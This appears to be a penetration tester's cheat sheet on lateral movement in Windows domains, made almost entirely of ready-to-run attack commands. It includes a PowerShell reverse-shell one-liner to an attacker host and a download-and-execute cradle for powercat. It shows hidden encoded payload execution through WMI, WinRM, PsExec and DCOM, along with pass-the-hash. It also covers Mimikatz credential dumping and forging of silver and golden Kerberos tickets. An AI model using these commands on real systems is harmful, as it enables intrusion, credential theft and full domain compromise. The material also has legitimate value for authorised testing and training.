Lateral Movement
Via Reverse Shells
Oneliner reverse shell:
$payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP>",<Listening Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))Powercat reverse shell:
$payload = "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1');powercat -c <Kali IP> -p <Listening Port> -e powershell"
$encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))WMI
On the Victime Machine:
wmic /node:<target IP> /user:<username> /password:<password> process call create "<payload>"
Execute payload
Example - wmic /node:<IP> /user:<username> /password:<password> process call create "cmd"
Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
Example - wmic /node:<IP> /user:<username> /password:<password> process call create "$full_payload"Powershell
$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$sessionOption = New-CimSessionOption -Protocol Dcom
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $sessionOption
$full_payload = "powershell -nop -w hidden -e $encodedPayload"
Execute payload
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $payload}
OR
New-PSSession -ComputerName <IP> -Credential $credential
WINRS
$full_payload = "powershell -nop -w hidden -e $encodedPayload"
winrs -r:<target IP/hostname> -u:<username> -p:<password> "$payload"PsExec
On Kali machine:
git clone https://github.com/davehardy20/sysinternals.git
> Located in sysinterals/psexec64.exe
> Transfer executable to the compromized machine
On Victim machine:
psexec64.exe -i \\<target IP/hostname> -u <domain name>\<username> -p "<password>" "<payload>"
Passing the Hash
On Kali machine:
impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
proxychains impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>DCOM
1. Instantiate a remote MMC 2.0 application
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))
2. Start up a listener to catch reverse shells on our kali
nc -nlvp 4444
3. Generate the payload, and
$full_payload = "powershell -nop -w hidden -e $encodedPayload"
$dcom.Document.ActiveView.ExecuteShellCommand("<cmd | powershell>",$null,"$full_payload","7")
4. Return to the listener on our kali, we should receive a reverse shell coming from the target machine.SSH private keys
ssh-keygen -t rsa
# Used to generate a ssh keypair
ssh -i <private key> <username>@<IP>
ssh -i <private key> <username>@<IP> -o IdentitiesOnly=yes
# Use when there are multiple private keys in the .ssh directoryMimikatz
./mimikatz.exe
privilege::debug
Identify target service user NTLM hash: sekurlsa::logonpasswords
Identify krbtgt NTLM hash: lsadump::lsa /patch
Get Domain SID: whoami /user
Overpass the Hash
sekurlsa::pth /user:<username> /ntlm:<NTLM hash> /domain:<domain name> /run:<cmd | powershell>
net use \\<target IP/hostname>
./PsExec64.exe \\<target IP/hostname> <cmd | powershell>
Pass the Ticket
sekurlsa::tickets /export
# dir *.kirbi | findstr <username>
kerberos::ptt <cifs.kirbi file name>
# Attempt to access the resource as the current user, the authentication process will now make use of the newly injected TGT
Example: ls \\<target IP/hostname>\<share name>
iwr -UseDefaultCredentials http://<target IP/hostname>
Silver Ticket for specific service:
kerberos::golden /rc4:<Target SPN NTLM Hash> /sid:<Domain SID> /domain:<domain name> /ptt /target:<Target SPN> /service:<service protocol> /user:<authorized username>
Golden Ticket for all services:
kerberos::golden /user:<username> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt>
Verify tickets with: klistCreating Users
Last updated